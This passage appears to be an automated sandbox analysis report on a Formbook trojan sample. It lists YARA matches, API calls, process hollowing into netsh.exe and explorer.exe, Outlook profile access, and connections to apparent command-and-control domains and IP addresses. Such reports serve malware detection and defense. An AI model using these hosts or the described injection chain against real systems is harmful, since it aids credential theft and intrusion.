          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_004063330_2_00406333
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_004049360_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2A9AA1_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B134E01_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1C4C01_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B18E701_2_00B18E70
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012B02_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0042193D2_2_0042193D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004212842_2_00421284
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012A42_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040B4532_2_0040B453
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040B4572_2_0040B457
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004224292_2_00422429
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004044C72_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004044BE2_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004046E72_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040FE872_2_0040FE87
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2A9AA2_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B134E02_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1C4C02_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B18E702_2_00B18E70
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: String function: 00B1D900 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: String function: 00B22574 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E087 NtAllocateVirtualMemory,2_2_0041E087
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory,2_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DEA7 NtCreateFile,2_2_0041DEA7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DF57 NtReadFile,2_2_0041DF57
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DFD7 NtClose,2_2_0041DFD7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E081 NtAllocateVirtualMemory,2_2_0041E081
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012A4 EntryPoint,NtProtectVirtualMemory,2_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004014E9 NtProtectVirtualMemory,2_2_004014E9
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DF52 NtReadFile,2_2_0041DF52
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DFD2 NtClose,2_2_0041DFD2
          Source: qHpeBvr9cR.exeReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exeVirustotal: Detection: 36%
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile read: C:\Users\user\Desktop\qHpeBvr9cR.exeJump to behavior
          Source: qHpeBvr9cR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\qHpeBvr9cR.exe C:\Users\user\Desktop\qHpeBvr9cR.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cefJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cefJump to behavior
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\nsx95CB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/4
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server1_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless2_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix2_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width2_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height2_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal2_2_00B118D0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server2_2_00B118D0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25A15 push ecx; ret 1_2_00B25A28
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210E9 push eax; ret 2_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210F2 push eax; ret 2_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0042109C push eax; ret 2_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00421153 push eax; ret 2_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040EAA3 push ecx; retf 2_2_0040EAA6
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E5D0 push ecx; iretd 2_2_0041E5D2
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00419F38 push edx; ret 2_2_00419F39
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041FF93 push ebx; retf 2_2_0041FF94
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25A15 push ecx; ret 2_2_00B25A28
          Source: febcldoukq.exe.0.drStatic PE information: section name: .00cfg
          Source: febcldoukq.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\febcldoukq.exeJump to dropped file
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.6 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25293 FindFirstFileExW,1_2_00B25293
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00B25347
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25293 FindFirstFileExW,2_2_00B25293
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B25347
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeAPI call chain: ExitProcess graph end nodegraph_0-3335
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.338206694.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B237DA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2258B GetProcessHeap,1_2_00B2258B
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2009E mov ecx, dword ptr fs:[00000030h]1_2_00B2009E
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2418D mov eax, dword ptr fs:[00000030h]1_2_00B2418D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2009E mov ecx, dword ptr fs:[00000030h]2_2_00B2009E
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2418D mov eax, dword ptr fs:[00000030h]2_2_00B2418D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040C317 LdrLoadDll,2_2_0040C317
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D720 SetUnhandledExceptionFilter,1_2_00B1D720
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B1DC2D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B237DA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B1D72C
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B1DC2D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B237DA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D720 SetUnhandledExceptionFilter,2_2_00B1D720
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B1D72C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\febcldoukq.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
